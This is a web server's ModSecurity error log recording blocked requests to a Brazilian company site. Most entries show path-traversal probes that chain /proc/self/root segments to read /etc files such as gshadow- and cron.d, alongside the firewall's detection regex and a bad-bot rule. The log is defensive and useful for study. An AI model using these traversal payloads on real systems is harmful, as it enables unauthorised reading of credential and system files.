[Tue Mar 17 11:23:41.719612 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:55814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj7at8Nd0UC_OcbVG6zgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:23:45.175284 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.241.46:45058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj8ZqmL8PQht4WJFlSpAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:23:45.239851 2026] [:error] [pid 9155:tid 140411548894976] [client 74.7.243.203:54556] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj8dbI7zhHXcabyMUwjgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:23:49.975743 2026] [:error] [pid 9299:tid 140411733534464] [client 74.7.243.203:54562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj9b-sgTmmJoPuMdyprwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:23:52.466745 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.243.203:44098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj-JqmL8PQht4WJFlSrAAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:24:07.987745 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:44108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkB9CmCSWTlPouqorXKgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:24:13.383699 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.241.46:54346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkDZqmL8PQht4WJFlSzAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:24:27.874574 2026] [:error] [pid 9155:tid 140411548894976] [client 74.7.243.203:37726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkG9bI7zhHXcabyMUwoQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:24:29.235242 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.203:42148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkHdY0UrI5A3LftIzs8AAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:24:30.450353 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.243.203:60688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkHtCmCSWTlPouqorXLQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:24:41.897893 2026] [:error] [pid 18709:tid 140411582465792] [client 74.7.241.46:45990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkKDarLhPAjZGI1b25kgAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:25:07.923036 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.241.46:50450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkQ9bI7zhHXcabyMUwuwAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:25:12.686996 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.244.31:43238] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablkSL-sgTmmJoPuMdypuwAAAsQ"]
[Tue Mar 17 11:25:56.904172 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.241.46:40492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkc5qmL8PQht4WJFlTUgAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:26:29.210190 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.228.16:54620] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablkldCmCSWTlPouqorXPQAAAMg"]
[Tue Mar 17 11:26:32.710995 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.203:60692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkmNY0UrI5A3LftIztWgAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:27:26.959767 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.203:50402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablkztY0UrI5A3LftIztjwAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:49.485188 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.203:59850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk5at8Nd0UC_OcbVG7CgAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:51.932367 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.203:36300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk59Y0UrI5A3LftIztlgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:53.305364 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.243.203:36308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk6aBJNF7axNlVR0UH2gAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:54.494861 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.203:36324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk6tY0UrI5A3LftIztmAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:56.716072 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.203:36330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk69Y0UrI5A3LftIztmgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:27:59.123151 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.203:36332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 